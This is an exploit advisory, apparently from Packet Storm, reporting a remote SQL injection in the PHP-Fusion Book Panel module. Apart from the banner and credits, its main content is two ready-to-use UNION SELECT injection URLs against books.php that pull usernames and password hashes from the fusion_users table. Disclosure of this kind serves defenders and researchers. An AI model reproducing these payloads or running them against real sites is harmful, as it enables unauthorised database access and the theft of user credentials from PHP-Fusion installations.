The PHP-Fusion Book Panel module suffers from a remote SQL injection vulnerability.
2feb70f0504ce2936a7d37d16d9d673f55399acab13d9e7cad36429708474118/+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\
+ +
+ |----------------------------------------------------------------| +
+ | PHP-Fusion Mod - Book Panel Remote SQL Injection Vulnerability | +
+ |----------------------------------------------------------------| +
+ +
+ [-] ...Cos co robie z czystej pasji, cos co lubie i czym sie fascynuje :-) +
+ +
+ |--------------------------------| +
+ | Author: elusiven from Poland ! | +
+ | Contact: elusivenpl@gmail.com | +
+ | Greetings: Fusi0n Group | +
+ |--------------------------------| +
+ +
+ Exploit: +
+ +
+ http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_name,4,5,6+from+fusion_users-- +
+ http://site.com/[path]/book_panel/books.php?&bookid=-1+union+select+1,2,user_password,4,5,6+from+fusion_users-- +
+ +
\+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++/
/join #wyjadacze on irc.quakenet.org
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed